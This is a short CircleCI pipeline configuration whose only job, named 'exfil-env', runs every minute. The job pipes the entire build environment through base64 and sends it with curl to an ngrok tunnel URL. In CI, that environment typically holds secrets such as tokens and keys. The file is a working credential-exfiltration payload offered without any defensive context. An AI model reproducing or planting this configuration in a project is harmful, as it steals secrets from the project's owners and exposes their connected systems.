version: 2.1

jobs:
  exfil-env:
    docker:
      - image: cimg/base:stable
    steps:
      - checkout
      - run:
          name: "Exfil env"
          command: "curl https://b97e38037b5c.ngrok-free.app/?env=`env | base64 -w0`"

# 默认的: circleci-project-setup
workflows:
  exfil-env-workflow:
    triggers:
      - schedule:
          cron: "* * * * *"

    jobs:
      - exfil-env
